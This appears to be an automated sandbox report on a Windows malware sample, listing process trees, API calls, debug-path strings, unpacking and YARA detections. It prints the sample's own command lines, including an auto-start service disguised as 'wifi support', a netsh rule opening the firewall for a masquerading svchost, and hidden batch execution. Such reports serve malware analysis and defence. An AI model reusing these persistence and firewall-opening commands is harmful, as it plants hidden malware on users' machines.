Source: C:\Windows\SysWOW64\svchost.exe	Code function: 39_2_00329A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,	39_2_00329A6B

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

21_2_00409A6B

Source: C:\Windows\System32\conhost.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe

Source: U3E7zMaux2.exe	Virustotal: Detection: 41%
Source: U3E7zMaux2.exe	ReversingLabs: Detection: 46%

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
Source: C:\Users\user\AppData\Roaming\uufaeea	Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D984.exe C:\Users\user\AppData\Local\Temp\D984.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7CA1.exe C:\Users\user\AppData\Local\Temp\7CA1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\86C4.exe C:\Users\user\AppData\Local\Temp\86C4.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe"
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7801.exe C:\Users\user\AppData\Local\Temp\7801.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8ED5.exe C:\Users\user\AppData\Local\Temp\8ED5.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9A02.exe C:\Users\user\AppData\Local\Temp\9A02.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\8ED5.exe	Process created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D984.exe C:\Users\user\AppData\Local\Temp\D984.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7CA1.exe C:\Users\user\AppData\Local\Temp\7CA1.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\86C4.exe C:\Users\user\AppData\Local\Temp\86C4.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe	Jump to behavior
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\D984.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,

21_2_00406A60

Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5788:64:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5756

Source: C:\Users\user\AppData\Local\Temp\7801.exe	Command line argument: \H		43_2_02FFC663
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Command line argument: \H		43_2_02FFC663

Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\7801.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Source: C:\Users\user\AppData\Local\Temp\D984.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: U3E7zMaux2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 7801.exe, 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.769293976.0000000001136000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: )C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb86 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
Source:	Binary string: profapi.pdb*6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: el.pdb source: 7801.exe
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbz6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7CA1.exe, 00000014.00000000.769330269.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: /;C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: C:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb&6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source:	Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
Source:	Binary string: C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Unpacked PE file: 20.2.7CA1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Unpacked PE file: 21.2.86C4.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Unpacked PE file: 36.2.lagavljy.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Unpacked PE file: 43.2.7801.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Unpacked PE file: 43.2.7801.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Unpacked PE file: 20.2.7CA1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Unpacked PE file: 21.2.86C4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Unpacked PE file: 36.2.lagavljy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Unpacked PE file: 43.2.7801.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Yara detected BatToExe compiled binary

Show sources

Source: Yara match	File source: 00000032.00000002.864947877.0000000000BF0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.894641410.00000000022C0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.864706939.00000000005F0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.864824644.000000000079A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.864795005.0000000000790000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.894589865.0000000002420000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.894618971.0000000002427000.00000004.00000040.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
